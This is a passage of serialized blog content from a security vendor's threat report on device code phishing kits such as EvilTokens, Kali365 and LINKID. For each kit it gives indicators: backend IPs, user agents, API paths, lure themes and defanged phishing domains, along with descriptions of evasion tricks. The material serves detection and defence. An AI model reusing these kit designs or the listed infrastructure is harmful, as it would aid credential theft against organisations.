",{"data":13579,"content":13580,"nodeType":695},{},[13581,13585,13593],{"data":13582,"marks":13583,"value":13584,"nodeType":699},{},[],"It wasn’t until August 2024 that in-the-wild exploitation was first identified, with Russia-linked campaigns then continuing into 2025 before entering mainstream criminal adoption. This trend has continued to gather momentum in 2026 with ",{"data":13586,"content":13588,"nodeType":791},{"uri":13587},"https:\u002F\u002Fthehackernews.com\u002F2026\u002F03\u002Fdevice-code-phishing-hits-340-microsoft.html",[13589],{"data":13590,"marks":13591,"value":2767,"nodeType":699},{},[13592],{"type":799},{"data":13594,"marks":13595,"value":13596,"nodeType":699},{},[],", the first reported criminal PhaaS kit for device code phishing, already powering massive campaigns after launching in February. ",{"data":13598,"content":13602,"nodeType":1041},{"target":13599},{"sys":13600},{"id":13601,"type":1046,"linkType":1047},"6xsfmbYEzpW7CdDiNzO6cu",[],{"data":13604,"content":13605,"nodeType":695},{},[13606],{"data":13607,"marks":13608,"value":13609,"nodeType":699},{},[],"Some of the noteworthy in-the-wild campaigns include:",{"data":13611,"content":13612,"nodeType":1589},{},[13613,13645,13666],{"data":13614,"content":13615,"nodeType":1593},{},[13616],{"data":13617,"content":13618,"nodeType":695},{},[13619,13623,13630,13633,13641],{"data":13620,"marks":13621,"value":13622,"nodeType":699},{},[],"Storm-2372, tracked by ",{"data":13624,"content":13625,"nodeType":791},{"uri":2750},[13626],{"data":13627,"marks":13628,"value":13629,"nodeType":699},{},[],"Microsoft",{"data":13631,"marks":13632,"value":7294,"nodeType":699},{},[],{"data":13634,"content":13636,"nodeType":791},{"uri":13635},"https:\u002F\u002Fwww.volexity.com\u002Fblog\u002F2025\u002F02\u002F13\u002Fmultiple-russian-threat-actors-targeting-microsoft-device-code-authentication\u002F",[13637],{"data":13638,"marks":13639,"value":13640,"nodeType":699},{},[],"Volexity",{"data":13642,"marks":13643,"value":13644,"nodeType":699},{},[],", linked to multiple Russia-aligned clusters, combining spear-phishing and social engineering with device code phishing payloads against strategic intelligence targets.",{"data":13646,"content":13647,"nodeType":1593},{},[13648],{"data":13649,"content":13650,"nodeType":695},{},[13651,13655,13662],{"data":13652,"marks":13653,"value":13654,"nodeType":699},{},[],"The massive Salesforce campaign operated by ",{"data":13656,"content":13658,"nodeType":791},{"uri":13657},"https:\u002F\u002Fpushsecurity.com\u002Fblog\u002Fscattered-lapsus-hunters\u002F",[13659],{"data":13660,"marks":13661,"value":2381,"nodeType":699},{},[],{"data":13663,"marks":13664,"value":13665,"nodeType":699},{},[]," (SLH) combined vishing with a device code phishing payload targeting Salesforce. The attacks morphed into a broader supply chain campaign using stolen credentials, ultimately resulting in 1000+ organizations being compromised and over 1.5 billion stolen records claimed. ",{"data":13667,"content":13668,"nodeType":1593},{},[13669],{"data":13670,"content":13671,"nodeType":695},{},[13672,13676,13684,13688,13697,13701,13710,13714,13722],{"data":13673,"marks":13674,"value":13675,"nodeType":699},{},[],"A massive spike in activity in late 2025 and 2026. This includes ",{"data":13677,"content":13679,"nodeType":791},{"uri":13678},"https:\u002F\u002Fwww.proofpoint.com\u002Fus\u002Fblog\u002Fthreat-insight\u002Faccess-granted-phishing-device-code-authorization-account-takeover",[13680],{"data":13681,"marks":13682,"value":13683,"nodeType":699},{},[],"multiple threat clusters",{"data":13685,"marks":13686,"value":13687,"nodeType":699},{},[]," tracked using device code phishing techniques, more ",{"data":13689,"content":13691,"nodeType":791},{"uri":13690},"https:\u002F\u002Fwww.bleepingcomputer.com\u002Fnews\u002Fsecurity\u002Fhackers-target-microsoft-entra-accounts-in-device-code-vishing-attacks\u002F",[13692],{"data":13693,"marks":13694,"value":13696,"nodeType":699},{},[13695],{"type":799},"criminal operations linked to SLH",{"data":13698,"marks":13699,"value":13700,"nodeType":699},{},[],", and ",{"data":13702,"content":13704,"nodeType":791},{"uri":13703},"https:\u002F\u002Fnewtonpaul.com\u002Fblog\u002Fdevice-code-phish-update\u002F",[13705],{"data":13706,"marks":13707,"value":13709,"nodeType":699},{},[13708],{"type":799},"hundreds of organizations being targeted via PhaaS architecture,",{"data":13711,"marks":13712,"value":13713,"nodeType":699},{},[]," which looks to be the same campaign as the recently uncovered EvilTokens PhaaS reported by ",{"data":13715,"content":13716,"nodeType":791},{"uri":3365},[13717],{"data":13718,"marks":13719,"value":13721,"nodeType":699},{},[13720],{"type":799},"Huntress",{"data":13723,"marks":13724,"value":13725,"nodeType":699},{},[]," (featuring abuse of the Railway PaaS platform). ",{"data":13727,"content":13731,"nodeType":1041},{"target":13728},{"sys":13729},{"id":13730,"type":1046,"linkType":1047},"3WLt6qLCK8CSwr0QZxZiMv",[],{"data":13733,"content":13734,"nodeType":721},{},[],{"data":13736,"content":13737,"nodeType":725},{},[13738],{"data":13739,"marks":13740,"value":13742,"nodeType":699},{},[13741],{"type":707},"What we’re seeing in the wild",{"data":13744,"content":13745,"nodeType":695},{},[13746],{"data":13747,"marks":13748,"value":13749,"nodeType":699},{},[],"As mentioned, we’ve also seen a huge spike in device code phishing activity this year, with multiple kits, page designs, and lure types. We’ve now identified 14+ distinct kits in circulation in the wild, with EvilTokens being the most prevalent. It’s clear that attackers are both spinning up their own kits and creative derivatives of others — we’ve seen kits that are visually similar to EvilTokens (close enough to be clones or forks) but with very different backends, for example AWS, Digital Ocean, 2cloud, and more. ",{"data":13751,"content":13755,"nodeType":1041},{"target":13752},{"sys":13753},{"id":13754,"type":1046,"linkType":1047},"nJCbTw85GKXdqrlIkzZwi",[],{"data":13757,"content":13758,"nodeType":721},{},[],{"data":13760,"content":13761,"nodeType":769},{},[13762],{"data":13763,"marks":13764,"value":13766,"nodeType":699},{},[13765],{"type":707},"“ANTIBOT” (EvilTokens)",{"data":13768,"content":13769,"nodeType":695},{},[13770,13773,13780,13783,13792,13796,13804],{"data":13771,"marks":13772,"value":21,"nodeType":699},{},[],{"data":13774,"content":13775,"nodeType":791},{"uri":3365},[13776],{"data":13777,"marks":13778,"value":13721,"nodeType":699},{},[13779],{"type":799},{"data":13781,"marks":13782,"value":2899,"nodeType":699},{},[],{"data":13784,"content":13786,"nodeType":791},{"uri":13785},"https:\u002F\u002Fblog.sekoia.io\u002Fnew-widespread-eviltokens-kit-device-code-phishing-as-a-service-part-1\u002F",[13787],{"data":13788,"marks":13789,"value":13791,"nodeType":699},{},[13790],{"type":799},"Sekoia",{"data":13793,"marks":13794,"value":13795,"nodeType":699},{},[],", and researcher ",{"data":13797,"content":13798,"nodeType":791},{"uri":13703},[13799],{"data":13800,"marks":13801,"value":13803,"nodeType":699},{},[13802],{"type":799},"Paul Newton",{"data":13805,"marks":13806,"value":13807,"nodeType":699},{},[]," have already done a great job of providing IOCs for the recent EvilTokens activity spike, including multiple backend Railway IPs in authentication events. ",{"data":13809,"content":13813,"nodeType":1041},{"target":13810},{"sys":13811},{"id":13812,"type":1046,"linkType":1047},"1XNviq5OvMf5TEAc59F6g5",[],{"data":13815,"content":13816,"nodeType":695},{},[13817],{"data":13818,"marks":13819,"value":13820,"nodeType":699},{},[],"Beyond the most widely observed implementation featuring a Cloudflare Workers frontend and Railway backend for authentication, we’ve also tracked additional versions of EvilTokens in circulation since January 2026 (many of which remain live along with the current “production” version of the kit). ",{"data":13822,"content":13823,"nodeType":695},{},[13824],{"data":13825,"marks":13826,"value":13827,"nodeType":699},{},[],"You can see an evolution of the kit in the videos and screenshots below, from early precursors seen in mid-January, the first mentions of ANTIBOT in the page code in late-January, the parallel development of a “Courts Access” fork that lacks the ANTIBOT references, and finally production EvilTokens in February. One of the key threads between the versions is the presence of a generateFallbackCode() JS function and use of a \u002Fgenerate-codes API call. ",{"data":13829,"content":13830,"nodeType":695},{},[13831],{"data":13832,"marks":13833,"value":13834,"nodeType":699},{},[],"Early implementations were quite different, for example using ScrapingBee to generate the displayed code, and varied hosting on vercel, fastly, edgeone, and others. ",{"data":13836,"content":13837,"nodeType":695},{},[13838],{"data":13839,"marks":13840,"value":13841,"nodeType":699},{},[],"After initially appearing on custom domains, the production version is now predominantly hosted on Cloudflare Workers, as per the broader tracking of the campaign. The descriptive HTML comments around ANTIBOT functions have also been removed in later versions. ",{"data":13843,"content":13844,"nodeType":695},{},[13845,13849,13857],{"data":13846,"marks":13847,"value":13848,"nodeType":699},{},[],"The production version of EvilTokens showcases common ",{"data":13850,"content":13851,"nodeType":791},{"uri":7498},[13852],{"data":13853,"marks":13854,"value":13856,"nodeType":699},{},[13855],{"type":799},"detection evasion techniques",{"data":13858,"marks":13859,"value":13860,"nodeType":699},{},[]," we've come to associate with PhaaS kits in the AiTM space — using multiple redirects through trusted sites before serving the malicious page, using bot protection to block security tools from analyzing the page, and so on. It also uses a pop-up window for the device code entry rather than a redirect, reducing the friction for the victim (it looks pretty convincing, too).",{"data":13862,"content":13866,"nodeType":1041},{"target":13863},{"sys":13864},{"id":13865,"type":1046,"linkType":1047},"73rNOIEDPfP5IJwpFaxVc2",[],{"data":13868,"content":13872,"nodeType":1041},{"target":13869},{"sys":13870},{"id":13871,"type":1046,"linkType":1047},"5BJSvOQUW9UpsQtoDNtgTC",[],{"data":13874,"content":13878,"nodeType":1041},{"target":13875},{"sys":13876},{"id":13877,"type":1046,"linkType":1047},"3dbePPxVb4h4SauGg3glIL",[],{"data":13880,"content":13884,"nodeType":1041},{"target":13881},{"sys":13882},{"id":13883,"type":1046,"linkType":1047},"1UOLcmNQvOsL5tdLSVuviq",[],{"data":13886,"content":13890,"nodeType":1041},{"target":13887},{"sys":13888},{"id":13889,"type":1046,"linkType":1047},"55XRqLSwUUi2D4ZVpJboml",[],{"data":13892,"content":13896,"nodeType":1041},{"target":13893},{"sys":13894},{"id":13895,"type":1046,"linkType":1047},"5wg5yr2Lo8t3f72ZV815c",[],{"data":13898,"content":13902,"nodeType":1041},{"target":13899},{"sys":13900},{"id":13901,"type":1046,"linkType":1047},"35cowlL6i3rkGXOGmSxlI1",[],{"data":13904,"content":13905,"nodeType":695},{},[13906],{"data":13907,"marks":13908,"value":21,"nodeType":699},{},[],{"data":13910,"content":13911,"nodeType":4687},{},[13912,13936,14019,14071,14095],{"data":13913,"content":13914,"nodeType":4691},{},[13915,13926],{"data":13916,"content":13917,"nodeType":4695},{},[13918],{"data":13919,"content":13920,"nodeType":695},{},[13921],{"data":13922,"marks":13923,"value":13925,"nodeType":699},{},[13924],{"type":707},"Frontend infrastructure",{"data":13927,"content":13928,"nodeType":4695},{},[13929],{"data":13930,"content":13931,"nodeType":695},{},[13932],{"data":13933,"marks":13934,"value":13935,"nodeType":699},{},[],"Workers.dev, vercel.app, github.io, fastly.net, edgeone.dev",{"data":13937,"content":13938,"nodeType":4691},{},[13939,13950],{"data":13940,"content":13941,"nodeType":4695},{},[13942],{"data":13943,"content":13944,"nodeType":695},{},[13945],{"data":13946,"marks":13947,"value":13949,"nodeType":699},{},[13948],{"type":707},"Backend infrastructure",{"data":13951,"content":13952,"nodeType":4695},{},[13953,13983],{"data":13954,"content":13955,"nodeType":695},{},[13956,13961,13965,13970,13974,13979],{"data":13957,"marks":13958,"value":13960,"nodeType":699},{},[13959],{"type":707},"Example IP: (V3) ",{"data":13962,"marks":13963,"value":13964,"nodeType":699},{},[],"162.220.232.71 (Railway AS400940) ",{"data":13966,"marks":13967,"value":13969,"nodeType":699},{},[13968],{"type":707},"(V2)",{"data":13971,"marks":13972,"value":13973,"nodeType":699},{},[]," 71.11.42.193 ",{"data":13975,"marks":13976,"value":13978,"nodeType":699},{},[13977],{"type":707},"(V1) ",{"data":13980,"marks":13981,"value":13982,"nodeType":699},{},[],"72.218.25.107",{"data":13984,"content":13985,"nodeType":695},{},[13986,13991,13994,13999,14003,14007,14011,14015],{"data":13987,"marks":13988,"value":13990,"nodeType":699},{},[13989],{"type":707},"Backend User Agent:",{"data":13992,"marks":13993,"value":4535,"nodeType":699},{},[],{"data":13995,"marks":13996,"value":13998,"nodeType":699},{},[13997],{"type":707},"(V3) ",{"data":14000,"marks":14001,"value":14002,"nodeType":699},{},[],"node, ",{"data":14004,"marks":14005,"value":13969,"nodeType":699},{},[14006],{"type":707},{"data":14008,"marks":14009,"value":14010,"nodeType":699},{},[],", Mozilla\u002F5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F73.0.3683 Safari\u002F537.36 OPR\u002F57.0.3098.91 ",{"data":14012,"marks":14013,"value":13978,"nodeType":699},{},[14014],{"type":707},{"data":14016,"marks":14017,"value":14018,"nodeType":699},{},[],"Mozilla\u002F5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit\u002F537.36 (KHTML, like Gecko) Chrome\u002F71.0.3578.98 Safari\u002F537.36 OPR\u002F56.0.3051.52 ",{"data":14020,"content":14021,"nodeType":4691},{},[14022,14033],{"data":14023,"content":14024,"nodeType":4695},{},[14025],{"data":14026,"content":14027,"nodeType":695},{},[14028],{"data":14029,"marks":14030,"value":14032,"nodeType":699},{},[14031],{"type":707},"Network paths",{"data":14034,"content":14035,"nodeType":4695},{},[14036,14043,14050,14057,14064],{"data":14037,"content":14038,"nodeType":695},{},[14039],{"data":14040,"marks":14041,"value":14042,"nodeType":699},{},[],"\u002Fapi\u002Frate-limit ",{"data":14044,"content":14045,"nodeType":695},{},[14046],{"data":14047,"marks":14048,"value":14049,"nodeType":699},{},[],"\u002Fapi\u002Ffingerprint ",{"data":14051,"content":14052,"nodeType":695},{},[14053],{"data":14054,"marks":14055,"value":14056,"nodeType":699},{},[],"\u002Fapi\u002Fcaptcha-verify ",{"data":14058,"content":14059,"nodeType":695},{},[14060],{"data":14061,"marks":14062,"value":14063,"nodeType":699},{},[],"\u002Fapi\u002Finit \u002Fapi\u002Fgenerate-code ",{"data":14065,"content":14066,"nodeType":695},{},[14067],{"data":14068,"marks":14069,"value":14070,"nodeType":699},{},[],"\u002Fapi\u002Fcheck-auth",{"data":14072,"content":14073,"nodeType":4691},{},[14074,14085],{"data":14075,"content":14076,"nodeType":4695},{},[14077],{"data":14078,"content":14079,"nodeType":695},{},[14080],{"data":14081,"marks":14082,"value":14084,"nodeType":699},{},[14083],{"type":707},"Lure themes",{"data":14086,"content":14087,"nodeType":4695},{},[14088],{"data":14089,"content":14090,"nodeType":695},{},[14091],{"data":14092,"marks":14093,"value":14094,"nodeType":699},{},[],"Various MS lures (e.g. Outlook, SharePoint, Teams) DocuSign, Adobe",{"data":14096,"content":14097,"nodeType":4691},{},[14098,14109],{"data":14099,"content":14100,"nodeType":4695},{},[14101],{"data":14102,"content":14103,"nodeType":695},{},[14104],{"data":14105,"marks":14106,"value":14108,"nodeType":699},{},[14107],{"type":707},"Example Domain",{"data":14110,"content":14111,"nodeType":4695},{},[14112,14124,14136,14148,14160],{"data":14113,"content":14114,"nodeType":695},{},[14115,14120],{"data":14116,"marks":14117,"value":14119,"nodeType":699},{},[14118],{"type":707},"Precursor A:",{"data":14121,"marks":14122,"value":14123,"nodeType":699},{},[]," teams-zpfvwnpxuc[.]edgeone.dev",{"data":14125,"content":14126,"nodeType":695},{},[14127,14132],{"data":14128,"marks":14129,"value":14131,"nodeType":699},{},[14130],{"type":707},"Precursor B: ",{"data":14133,"marks":14134,"value":14135,"nodeType":699},{},[],"authenticate-m365-accountsecurity-m-pi[.]vercel.app",{"data":14137,"content":14138,"nodeType":695},{},[14139,14144],{"data":14140,"marks":14141,"value":14143,"nodeType":699},{},[14142],{"type":707},"Courts Access: ",{"data":14145,"marks":14146,"value":14147,"nodeType":699},{},[],"secure-systems-validations-courts[.]vercel.app",{"data":14149,"content":14150,"nodeType":695},{},[14151,14156],{"data":14152,"marks":14153,"value":14155,"nodeType":699},{},[14154],{"type":707},"Early ANTIBOT:",{"data":14157,"marks":14158,"value":14159,"nodeType":699},{},[]," interface-auth-en-useast[.]global.ssl.fastly.net",{"data":14161,"content":14162,"nodeType":695},{},[14163,14168],{"data":14164,"marks":14165,"value":14167,"nodeType":699},{},[14166],{"type":707},"Production ANTIBOT: ",{"data":14169,"marks":14170,"value":14171,"nodeType":699},{},[],"index-z059-document-pending-reviewsign-xlss7994824[.]awalizer[.]workers.dev",{"data":14173,"content":14174,"nodeType":721},{},[],{"data":14176,"content":14177,"nodeType":769},{},[14178],{"data":14179,"marks":14180,"value":14182,"nodeType":699},{},[14181],{"type":707},"“SHAREFILE”",{"data":14184,"content":14185,"nodeType":4687},{},[14186,14209,14248,14271,14294],{"data":14187,"content":14188,"nodeType":4691},{},[14189,14199],{"data":14190,"content":14191,"nodeType":4695},{},[14192],{"data":14193,"content":14194,"nodeType":695},{},[14195],{"data":14196,"marks":14197,"value":13925,"nodeType":699},{},[14198],{"type":707},{"data":14200,"content":14201,"nodeType":4695},{},[14202],{"data":14203,"content":14204,"nodeType":695},{},[14205],{"data":14206,"marks":14207,"value":14208,"nodeType":699},{},[],"No hosting markers visible.",{"data":14210,"content":14211,"nodeType":4691},{},[14212,14222],{"data":14213,"content":14214,"nodeType":4695},{},[14215],{"data":14216,"content":14217,"nodeType":695},{},[14218],{"data":14219,"marks":14220,"value":13949,"nodeType":699},{},[14221],{"type":707},{"data":14223,"content":14224,"nodeType":4695},{},[14225,14237],{"data":14226,"content":14227,"nodeType":695},{},[14228,14233],{"data":14229,"marks":14230,"value":14232,"nodeType":699},{},[14231],{"type":707},"Example IP:",{"data":14234,"marks":14235,"value":14236,"nodeType":699},{},[]," 147.45.60.47 (Global Connectivity Solutions LLP AS215540)",{"data":14238,"content":14239,"nodeType":695},{},[14240,14244],{"data":14241,"marks":14242,"value":13990,"nodeType":699},{},[14243],{"type":707},{"data":14245,"marks":14246,"value":14247,"nodeType":699},{},[]," node",{"data":14249,"content":14250,"nodeType":4691},{},[14251,14261],{"data":14252,"content":14253,"nodeType":4695},{},[14254],{"data":14255,"content":14256,"nodeType":695},{},[14257],{"data":14258,"marks":14259,"value":14032,"nodeType":699},{},[14260],{"type":707},{"data":14262,"content":14263,"nodeType":4695},{},[14264],{"data":14265,"content":14266,"nodeType":695},{},[14267],{"data":14268,"marks":14269,"value":14270,"nodeType":699},{},[],"POST \u002Fapi\u002Fdevice\u002Fstart  POST \u002Fapi\u002Fdevice\u002Fpoll",{"data":14272,"content":14273,"nodeType":4691},{},[14274,14284],{"data":14275,"content":14276,"nodeType":4695},{},[14277],{"data":14278,"content":14279,"nodeType":695},{},[14280],{"data":14281,"marks":14282,"value":14084,"nodeType":699},{},[14283],{"type":707},{"data":14285,"content":14286,"nodeType":4695},{},[14287],{"data":14288,"content":14289,"nodeType":695},{},[14290],{"data":14291,"marks":14292,"value":14293,"nodeType":699},{},[],"Citrix ShareFile document transfer — file card with sender info, expiry warning, download\u002Fpreview buttons",{"data":14295,"content":14296,"nodeType":4691},{},[14297,14308],{"data":14298,"content":14299,"nodeType":4695},{},[14300],{"data":14301,"content":14302,"nodeType":695},{},[14303],{"data":14304,"marks":14305,"value":14307,"nodeType":699},{},[14306],{"type":707},"Example domain",{"data":14309,"content":14310,"nodeType":4695},{},[14311],{"data":14312,"content":14313,"nodeType":695},{},[14314],{"data":14315,"marks":14316,"value":14317,"nodeType":699},{},[],"cghdfg[.]vbchkioi[.]su",{"data":14319,"content":14323,"nodeType":1041},{"target":14320},{"sys":14321},{"id":14322,"type":1046,"linkType":1047},"1TtZ6VsMSTlPvy7W996w9E",[],{"data":14325,"content":14326,"nodeType":721},{},[],{"data":14328,"content":14329,"nodeType":769},{},[14330],{"data":14331,"marks":14332,"value":14334,"nodeType":699},{},[14333],{"type":707},"Kali365 (internal name “CLURE”)",{"data":14336,"content":14337,"nodeType":695},{},[14338,14342,14346,14350,14358,14362,14370],{"data":14339,"marks":14340,"value":14341,"nodeType":699},{},[],"Clure was recently linked to the ",{"data":14343,"marks":14344,"value":2779,"nodeType":699},{},[14345],{"type":707},{"data":14347,"marks":14348,"value":14349,"nodeType":699},{},[]," PhaaS platform based on an ",{"data":14351,"content":14353,"nodeType":791},{"uri":14352},"https:\u002F\u002Fwww.ic3.gov\u002FPSA\u002F2026\u002FPSA260521",[14354],{"data":14355,"marks":14356,"value":14357,"nodeType":699},{},[],"FBI advisory",{"data":14359,"marks":14360,"value":14361,"nodeType":699},{},[]," and additional research from ",{"data":14363,"content":14365,"nodeType":791},{"uri":14364},"https:\u002F\u002Farcticwolf.com\u002Fresources\u002Fblog\u002Ftoken-bingo-dont-let-your-code-be-the-winner\u002F",[14366],{"data":14367,"marks":14368,"value":14369,"nodeType":699},{},[],"Arctic Wolf",{"data":14371,"marks":14372,"value":14373,"nodeType":699},{},[],". This is yet another example of Device Code Phishing and AiTM phishing capabilities being integrated into unified phishing platforms. ",{"data":14375,"content":14376,"nodeType":4687},{},[14377,14400,14439,14462,14485],{"data":14378,"content":14379,"nodeType":4691},{},[14380,14390],{"data":14381,"content":14382,"nodeType":4695},{},[14383],{"data":14384,"content":14385,"nodeType":695},{},[14386],{"data":14387,"marks":14388,"value":13925,"nodeType":699},{},[14389],{"type":707},{"data":14391,"content":14392,"nodeType":4695},{},[14393],{"data":14394,"content":14395,"nodeType":695},{},[14396],{"data":14397,"marks":14398,"value":14399,"nodeType":699},{},[],"API on api.duemineral.uk:8443 and api.loadingdocuments.uk:8443 (rotates). ",{"data":14401,"content":14402,"nodeType":4691},{},[14403,14413],{"data":14404,"content":14405,"nodeType":4695},{},[14406],{"data":14407,"content":14408,"nodeType":695},{},[14409],{"data":14410,"marks":14411,"value":13949,"nodeType":699},{},[14412],{"type":707},{"data":14414,"content":14415,"nodeType":4695},{},[14416,14428],{"data":14417,"content":14418,"nodeType":695},{},[14419,14424],{"data":14420,"marks":14421,"value":14423,"nodeType":699},{},[14422],{"type":707},"Example IP: ",{"data":14425,"marks":14426,"value":14427,"nodeType":699},{},[],"162.243.166.119 (DigitalOcean AS14061)",{"data":14429,"content":14430,"nodeType":695},{},[14431,14435],{"data":14432,"marks":14433,"value":13990,"nodeType":699},{},[14434],{"type":707},{"data":14436,"marks":14437,"value":14438,"nodeType":699},{},[]," python-requests\u002F2.32.5",{"data":14440,"content":14441,"nodeType":4691},{},[14442,14452],{"data":14443,"content":14444,"nodeType":4695},{},[14445],{"data":14446,"content":14447,"nodeType":695},{},[14448],{"data":14449,"marks":14450,"value":14032,"nodeType":699},{},[14451],{"type":707},{"data":14453,"content":14454,"nodeType":4695},{},[14455],{"data":14456,"content":14457,"nodeType":695},{},[14458],{"data":14459,"marks":14460,"value":14461,"nodeType":699},{},[],"GET \u002Fapi\u002Fstatus\u002F{numeric_SID} (port :8443)",{"data":14463,"content":14464,"nodeType":4691},{},[14465,14475],{"data":14466,"content":14467,"nodeType":4695},{},[14468],{"data":14469,"content":14470,"nodeType":695},{},[14471],{"data":14472,"marks":14473,"value":14084,"nodeType":699},{},[14474],{"type":707},{"data":14476,"content":14477,"nodeType":4695},{},[14478],{"data":14479,"content":14480,"nodeType":695},{},[14481],{"data":14482,"marks":14483,"value":14484,"nodeType":699},{},[],"SharePoint \"Team Site\" doc library, SharePoint \"Shared Document\" individual share",{"data":14486,"content":14487,"nodeType":4691},{},[14488,14498],{"data":14489,"content":14490,"nodeType":4695},{},[14491],{"data":14492,"content":14493,"nodeType":695},{},[14494],{"data":14495,"marks":14496,"value":14307,"nodeType":699},{},[14497],{"type":707},{"data":14499,"content":14500,"nodeType":4695},{},[14501],{"data":14502,"content":14503,"nodeType":695},{},[14504],{"data":14505,"marks":14506,"value":14507,"nodeType":699},{},[],"auth[.]duemineral[.]uk",{"data":14509,"content":14513,"nodeType":1041},{"target":14510},{"sys":14511},{"id":14512,"type":1046,"linkType":1047},"Y1AiT3dJRTXz64pb68kca",[],{"data":14515,"content":14516,"nodeType":721},{},[],{"data":14518,"content":14519,"nodeType":769},{},[14520],{"data":14521,"marks":14522,"value":14524,"nodeType":699},{},[14523],{"type":707},"“LINKID”",{"data":14526,"content":14527,"nodeType":4687},{},[14528,14551,14596,14626,14649],{"data":14529,"content":14530,"nodeType":4691},{},[14531,14541],{"data":14532,"content":14533,"nodeType":4695},{},[14534],{"data":14535,"content":14536,"nodeType":695},{},[14537],{"data":14538,"marks":14539,"value":13925,"nodeType":699},{},[14540],{"type":707},{"data":14542,"content":14543,"nodeType":4695},{},[14544],{"data":14545,"content":14546,"nodeType":695},{},[14547],{"data":14548,"marks":14549,"value":14550,"nodeType":699},{},[],"Adobe variant has Cloudflare challenge-platform iframe (CF-protected origin). Relative API paths — self-hosted.",{"data":14552,"content":14553,"nodeType":4691},{},[14554,14564],{"data":14555,"content":14556,"nodeType":4695},{},[14557],{"data":14558,"content":14559,"nodeType":695},{},[14560],{"data":14561,"marks":14562,"value":13949,"nodeType":699},{},[14563],{"type":707},{"data":14565,"content":14566,"nodeType":4695},{},[14567,14578,14585],{"data":14568,"content":14569,"nodeType":695},{},[14570,14574],{"data":14571,"marks":14572,"value":14423,"nodeType":699},{},[14573],{"type":707},{"data":14575,"marks":14576,"value":14577,"nodeType":699},{},[],"185.176.220.22 (2cloud.eu AS39845)",{"data":14579,"content":14580,"nodeType":695},{},[14581],{"data":14582,"marks":14583,"value":14584,"nodeType":699},{},[],"2600:1f10:470d:9a00:1437:ec30:be61:3494 (AWS AS16509)",{"data":14586,"content":14587,"nodeType":695},{},[14588,14592],{"data":14589,"marks":14590,"value":13990,"nodeType":699},{},[14591],{"type":707},{"data":14593,"marks":14594,"value":14595,"nodeType":699},{},[]," axios\u002F1.10.0 , axios\u002F1.13.6",{"data":14597,"content":14598,"nodeType":4691},{},[14599,14609],{"data":14600,"content":14601,"nodeType":4695},{},[14602],{"data":14603,"content":14604,"nodeType":695},{},[14605],{"data":14606,"marks":14607,"value":14032,"nodeType":699},{},[14608],{"type":707},{"data":14610,"content":14611,"nodeType":4695},{},[14612,14619],{"data":14613,"content":14614,"nodeType":695},{},[14615],{"data":14616,"marks":14617,"value":14618,"nodeType":699},{},[],"POST \u002Fapi\u002Fdevice\u002Fstart",{"data":14620,"content":14621,"nodeType":695},{},[14622],{"data":14623,"marks":14624,"value":14625,"nodeType":699},{},[],"GET \u002Fapi\u002Fdevice\u002Fstatus\u002F{sessionId}",{"data":14627,"content":14628,"nodeType":4691},{},[14629,14639],{"data":14630,"content":14631,"nodeType":4695},{},[14632],{"data":14633,"content":14634,"nodeType":695},{},[14635],{"data":14636,"marks":14637,"value":14084,"nodeType":699},{},[14638],{"type":707},{"data":14640,"content":14641,"nodeType":4695},{},[14642],{"data":14643,"content":14644,"nodeType":695},{},[14645],{"data":14646,"marks":14647,"value":14648,"nodeType":699},{},[],"MS Teams meeting invitation (with interactive date\u002Ftime picker), Adobe Acrobat Sign document review",{"data":14650,"content":14651,"nodeType":4691},{},[14652,14662],{"data":14653,"content":14654,"nodeType":4695},{},[14655],{"data":14656,"content":14657,"nodeType":695},{},[14658],{"data":14659,"marks":14660,"value":14307,"nodeType":699},{},[14661],{"type":707},{"data":14663,"content":14664,"nodeType":4695},{},[14665],{"data":14666,"content":14667,"nodeType":695},{},[14668],{"data":14669,"marks":14670,"value":14671,"nodeType":699},{},[],"sdtr-site[.]cfd",{"data":14673,"content":14677,"nodeType":1041},{"target":14674},{"sys":14675},{"id":14676,"type":1046,"linkType":1047},"22hsIzlkptC2JTIUtbOuUn",[],{"data":14679,"content":14680,"nodeType":721},{},[],{"data":14682,"content":14683,"nodeType":769},{},[14684],{"data":14685,"marks":14686,"value":14688,"nodeType":699},{},[14687],{"type":707},"Device Code Lab (formerly codename \"AUTHOV”)",{"data":14690,"content":14694,"nodeType":1041},{"target":14691},{"sys":14692},{"id":14693,"type":1046,"linkType":1047},"5vllVaa0Ry0wKs46ssrZLC",[],{"data":14696,"content":14697,"nodeType":4687},{},[14698,14721,14767,14790,14813],{"data":14699,"content":14700,"nodeType":4691},{},[14701,14711],{"data":14702,"content":14703,"nodeType":4695},{},[14704],{"data":14705,"content":14706,"nodeType":695},{},[14707],{"data":14708,"marks":14709,"value":13925,"nodeType":699},{},[14710],{"type":707},{"data":14712,"content":14713,"nodeType":4695},{},[14714],{"data":14715,"content":14716,"nodeType":695},{},[14717],{"data":14718,"marks":14719,"value":14720,"nodeType":699},{},[],"workers.dev",{"data":14722,"content":14723,"nodeType":4691},{},[14724,14734],{"data":14725,"content":14726,"nodeType":4695},{},[14727],{"data":14728,"content":14729,"nodeType":695},{},[14730],{"data":14731,"marks":14732,"value":13949,"nodeType":699},{},[14733],{"type":707},{"data":14735,"content":14736,"nodeType":4695},{},[14737,14748],{"data":14738,"content":14739,"nodeType":695},{},[14740,14744],{"data":14741,"marks":14742,"value":14423,"nodeType":699},{},[14743],{"type":707},{"data":14745,"marks":14746,"value":14747,"nodeType":699},{},[],"192.3.225.100 (HostPapa \u002F ColoCrossing AS36352)",{"data":14749,"content":14750,"nodeType":695},{},[14751,14755,14758,14763],{"data":14752,"marks":14753,"value":13990,"nodeType":699},{},[14754],{"type":707},{"data":14756,"marks":14757,"value":4535,"nodeType":699},{},[],{"data":14759,"marks":14760,"value":14762,"nodeType":699},{},[14761],{"type":707}," ",{"data":14764,"marks":14765,"value":14766,"nodeType":699},{},[],"python-httpx\u002F0.28.1",{"data":14768,"content":14769,"nodeType":4691},{},[14770,14780],{"data":14771,"content":14772,"nodeType":4695},{},[14773],{"data":14774,"content":14775,"nodeType":695},{},[14776],{"data":14777,"marks":14778,"value":14032,"nodeType":699},{},[14779],{"type":707},{"data":14781,"content":14782,"nodeType":4695},{},[14783],{"data":14784,"content":14785,"nodeType":695},{},[14786],{"data":14787,"marks":14788,"value":14789,"nodeType":699},{},[],"GET 